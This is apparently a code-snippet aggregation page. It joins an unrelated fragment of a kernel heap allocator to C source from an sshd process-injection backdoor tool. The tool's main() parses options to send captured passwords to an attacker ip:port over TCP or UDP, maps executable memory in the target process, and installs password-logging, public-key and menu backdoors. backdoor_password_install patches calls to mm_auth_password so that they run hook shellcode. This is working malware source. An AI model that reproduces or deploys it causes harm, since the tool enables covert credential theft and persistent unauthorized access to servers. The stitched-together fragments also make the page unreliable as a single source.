		    footer_t *footer = (footer_t *) (old_end_address + header->size - sizeof(footer_t));
		    footer->magic = HEAP_MAGIC;
		    footer->header = header;
		    insert_list((void*)header, &heap->index);
		}
		else
		{
		    header_t *header = lookup_list(idx, &heap->index);
		    header->size += new_length - old_length;
		    footer_t *footer = (footer_t *) ( (uint32_t)header + header->size - sizeof(footer_t) );
		    footer->header = header;
		    footer->magic = HEAP_MAGIC;
		}
		
		return alloc(size, page_align, heap);
	}
	
	header_t *orig_hole_header = (header_t *)lookup_list(iterator, &heap->index);
	uint32_t orig_hole_pos = (uint32_t) orig_hole_header;
	uint32_t orig_hole_size = orig_hole_header->size;
		
	if (orig_hole_size - new_size < sizeof(header_t) + sizeof(footer_t)) {
		size += orig_hole_size - new_size;
		new_size = orig_hole_size;
	}
	
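	/* If page alignment was requested, carve off a padding hole so the returned pointer (just past the header) lands on a page boundary. */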
	if (page_align && (orig_hole_pos & 0xFFFFF000)) {
		uint32_t new_location = orig_hole_pos + 0x1000 - (orig_hole_pos & 0xFFF) - sizeof(header_t);
		header_t *hole_header = (header_t*) orig_hole_pos;
		hole_header->size = 0x1000;
		hole_header->magic = HEAP_MAGIC;
		hole_header->is_hole = 1;
		footer_t *hole_footer = (footer_t*) ((uint32_t) new_location - sizeof(footer_t));
		hole_footer->magic = HEAP_MAGIC;
		hole_footer->header = hole_header;
		orig_hole_pos = new_location;
		orig_hole_size = orig_hole_size - hole_header->size;
	} else {
		remove_list(iterator, &heap->index);
	}
	
	header_t *block_header = (header_t*) orig_hole_pos;
	block_header->magic = HEAP_MAGIC;
	block_header->is_hole = 0;
	block_header->size = new_size;
	
	footer_t *block_footer = (footer_t*) (orig_hole_pos + sizeof(header_t) + size);
	block_footer->header = block_header;
	
	if (orig_hole_size - new_size > 0) {
		header_t *hole_header = (header_t*) (orig_hole_pos + sizeof(header_t) + size + sizeof(footer_t));
		hole_header->magic = HEAP_MAGIC;
		hole_header->is_hole = 1;
		hole_header->size = orig_hole_size - new_size;
		footer_t *hole_footer = (footer_t*) ((uint32_t) hole_header + orig_hole_size - new_size - sizeof(footer_t));
		
		if ((uint32_t) hole_footer < heap->end_address) {
			hole_footer->magic = HEAP_MAGIC;
			hole_footer->header = hole_header;			
		}
		insert_list((void*)hole_header, &heap->index);
	}
	return (void*) ((uint32_t) block_header + sizeof(header_t));
}
Example No. 15
int main(int argc, char *argv[]) {
	config_block *config;
	char *pubkey_value = NULL;
	char *passlog_path = NULL;
	char *pubkey_file = NULL;
	int  menu_activate = 0;
	int  c;

	banner();

	if (argc < 2) {
		usage(argv[0]);
		return -1;
	}

 	config = malloc(sizeof(config_block));
	memset(config, 0, sizeof(config_block));

	while((c = getopt(argc-1, argv, "p:P:t:u:l:mc")) != -1) {
		switch(c) {
			case 'p':
				pubkey_value = optarg;
			break;

			case 'P':
				pubkey_file = optarg;
			break;

			case 't':
				if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port))
					error("eh, '%s' is not a valid ip:port pair", optarg);

				config->net_type |= NET_EXFIL_TCP;
			break;

			case 'u':
				if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port))
					error("eh, '%s' is not a valid ip:port pair", optarg);

				config->net_type |= NET_EXFIL_UDP;
			break;

			case 'c':
				config->only_log_valid = 1;
			break;

			case 'l':
				passlog_path = optarg;
			break;

			case 'm':
				menu_activate = 1;
			break;
		}
	}

	if (pubkey_file == NULL && pubkey_value == NULL && passlog_path == NULL && menu_activate == 0) {
		usage(argv[0]);
		return -1;
	}

	if (pubkey_value != NULL && pubkey_file != NULL) {
		usage(argv[0]);
		return -1;
	}

	if ((config->net_type & NET_EXFIL_TCP) && (config->net_type & NET_EXFIL_UDP)) {
		error("can only use one net exfiltration method.");
		return -1;
	}

	// allocate inject context
	inject_ctx *ctx = malloc(sizeof(inject_ctx));

	// init inject context
	inject_ctx_init(ctx, atoi(argv[argc-1]));

	// find rexec_flag
	u64 rexec_flag = inject_resolve_rexec(ctx);
	info("rexec_flag\t\t\t= 0x%lx", rexec_flag); 

	// install config memory block
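	// find_hole() is assumed here to scan the target's address space for an unmapped 0x1000-byte region near rexec_flag, which is then mapped with MAP_FIXED below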
	ctx->config_addr = find_hole(ctx, rexec_flag, 0x1000);

	info("allocating config memory @ 0x%lx", ctx->config_addr);

	_mmap(
		ctx, (void*)ctx->config_addr, 0x1000,
		PROT_READ| PROT_WRITE | PROT_EXEC,
		MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
		0, 0
	);

	inject_ctx_map_reload(ctx);

	// install backdoor(s)
	if(config->net_type != 0) {
		backdoor_password_install(ctx);
		inject_ctx_map_reload(ctx);
	}

	if (pubkey_value != NULL || pubkey_file != NULL) {
		if (pubkey_file != NULL) {
			FILE *f = fopen(pubkey_file, "rb");

			if (f == NULL) {
				error("could not open pubkey file ('%s')", pubkey_file);
			}

			char keybuf[2048];
			memset(keybuf, 0, 2048);
			fgets(keybuf, 2047, f);
			fclose(f);

			if(strncmp(keybuf, "ssh-rsa", 7) != 0) {
				error("invalid pubkey specified, we only support ssh-rsa for now");
			}

			strcpy(config->pubkey, keybuf);

			backdoor_pubkey_install(ctx);
		} else {
			if(strncmp(pubkey_value, "ssh-rsa", 7) != 0) {
				error("invalid pubkey specified, we only support ssh-rsa for now");
			}

			strcpy(config->pubkey, pubkey_value);

			backdoor_pubkey_install(ctx);
		}

		inject_ctx_map_reload(ctx);
	}

	if (menu_activate) {
		backdoor_menu_install(ctx);
		inject_ctx_map_reload(ctx);
	}

	mod_banner("finishing install");

	// upload config data
	info("uploading config..");
	_poke(ctx->pid, ctx->config_addr, config, sizeof(config_block));

	// disable rexec
	info("switching off rexec..");
	u32 null_word = 0;
	_poke(ctx->pid, rexec_flag, &null_word, 4);

	// clean up
	inject_ctx_deinit(ctx);
	callcache_free();

	info("all done!");

	return 0;
}
Example No. 16
void backdoor_password_install(inject_ctx *ctx) {
	u32 use_privsep_val=0;
	u64 use_privsep;
	u64 *mm_auth_password_calls = NULL;
	int i, n_mm_auth_password_calls;
	u64 diff=0, hole_addr=0;
	u8 *evil_bin;

	mod_banner("installing passlogger backdoor");

	evil_bin = malloc(hook_passlog_bin_len);
	memcpy(evil_bin, hook_passlog_bin, hook_passlog_bin_len);

	u64 *import_table = (u64*)(evil_bin + 8);

	use_privsep = resolve_symbol_tab(ctx, "use_privsep");

	if (use_privsep == 0)
		error("could not locate use_privsep :(");

	info("use_privsep\t\t= 0x%llx", use_privsep);

	_peek(ctx->pid, use_privsep, &use_privsep_val, 4);

	info("use_privsep\t\t= 0x%x", use_privsep_val);

	if (use_privsep_val == 0) {
		error("pass logging for PRIVSEP_OFF currently not supported.");
	}

	u64 mm_auth_password = sub_by_debugstr(ctx, "%s: waiting for MONITOR_ANS_AUTHPASSWORD");
	info("mm_auth_password\t\t= 0x%llx", mm_auth_password);

	n_mm_auth_password_calls = find_calls(&mm_auth_password_calls, mm_auth_password);

	if (n_mm_auth_password_calls == 0)
		error("No calls to mm_auth_password found.");

	hole_addr = find_hole(ctx, mm_auth_password_calls[0], 0x1000);
	
	if (hole_addr == 0) {
		error("unable to find neighborly hole.");
	}

	info("found usable hole @ 0x%lx", hole_addr);

	_mmap(
		ctx, (void*)hole_addr, 0x1000,
		PROT_READ| PROT_WRITE | PROT_EXEC,
		MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
		0, 0
	);

	_peek(ctx->pid, use_privsep, &use_privsep_val, 4);
	
	// Patch mm_auth_password
	for (i = 0; i < n_mm_auth_password_calls; i++) {
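		/* rel32 operand for the 5-byte E8 call: target minus (address of the call + 5), modulo 2^32. */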
		diff = 0x100000000-(mm_auth_password_calls[i]-hole_addr)-5;

		info(
			"building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]",
			mm_auth_password_calls[i], hole_addr,
			diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff
		);

		_poke(ctx->pid, mm_auth_password_calls[i]+1, &diff, 4);
	}

	import_table[0] = ctx->config_addr;
	import_table[1] = mm_auth_password;

	_poke(ctx->pid, hole_addr, evil_bin, hook_passlog_bin_len);
	
	free(mm_auth_password_calls);
}